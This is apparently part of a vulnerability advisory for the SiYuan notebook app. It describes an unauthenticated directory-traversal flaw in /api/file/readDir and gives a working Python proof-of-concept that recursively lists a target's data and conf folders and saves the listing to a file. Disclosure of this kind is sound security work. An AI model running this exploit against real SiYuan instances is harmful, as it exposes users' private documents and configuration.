+ "details": "### Details\n\nThe /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"POC: SiYuan /api/file/readDir unauthenticated directory traversal\"\"\"\nimport requests, json, sys\n\ndef poc(target):\n    base = target.rstrip(\"/\")\n    url = f\"{base}/api/file/readDir\"\n\n    def read_dir(path, depth=0, max_depth=4):\n        try:\n            r = requests.post(url, json={\"path\": path},\n                              headers={\"Content-Type\": \"application/json\"}, timeout=10)\n            data = r.json()\n        except Exception:\n            return\n        if data.get(\"code\") != 0:\n            return\n\n        entries = data.get(\"data\") or []\n        for entry in entries:\n            name = entry.get(\"name\", \"\")\n            if name.startswith(\".\"):\n                continue\n            icon = \"📁\" if entry.get(\"isDir\") else \"📄\"\n            indent = \" \" * depth\n            print(f\" {indent}{icon} {name}\")\n\n            if entry.get(\"isDir\") and depth < max_depth:\n                read_dir(f\"{path}/{name}\", depth + 1, max_depth)\n\n    # Walk the top-level directories\n    print(\"[+] 漏洞存在!开始遍历\\n\")\n    print(\" 📂 data/\")\n    read_dir(\"data\", max_depth=2)\n\n    print(\"\\n 📂 conf/\")\n    read_dir(\"conf\", max_depth=2)\n\n    # Save the raw response for the data directory\n    try:\n        r = requests.post(url, json={\"path\": \"data\"},\n                          headers={\"Content-Type\": \"application/json\"}, timeout=10)\n        with open(\"readdir.json\", \"w\", encoding=\"utf-8\") as f:\n            json.dump(r.json(), f, ensure_ascii=False, indent=2)\n        print(\"\\n[+] 根目录数据已保存: readdir.json\")\n    except Exception:\n        pass\n\nif __name__ == \"__main__\":\n    poc(sys.argv[1] if len(sys.argv) > 1 else \"http://172.18.40.184\")\n```\n\n### Impact\n\nDirectory traversal vulnerability: the entire directory structure of a notebook could be obtained, and a file reading vulnerability could then be exploited to achieve arbitrary document reading.\n\nAssets folder\n\n<img width=\"943\" height=\"794\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c97fcc42-183e-4c83-8a27-cf99bf805038\" />\n\nPlugins folder\n\n<img width=\"826\" height=\"921\" alt=\"image\" src=\"https://github.com/user-attachments/assets/925d4512-e4c0-4b3b-bf96-5639ec572705\" />\n\nconf folder\n\n<img width=\"730\" height=\"834\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2a0c23b9-2d87-4421-977d-687f47726741\" />",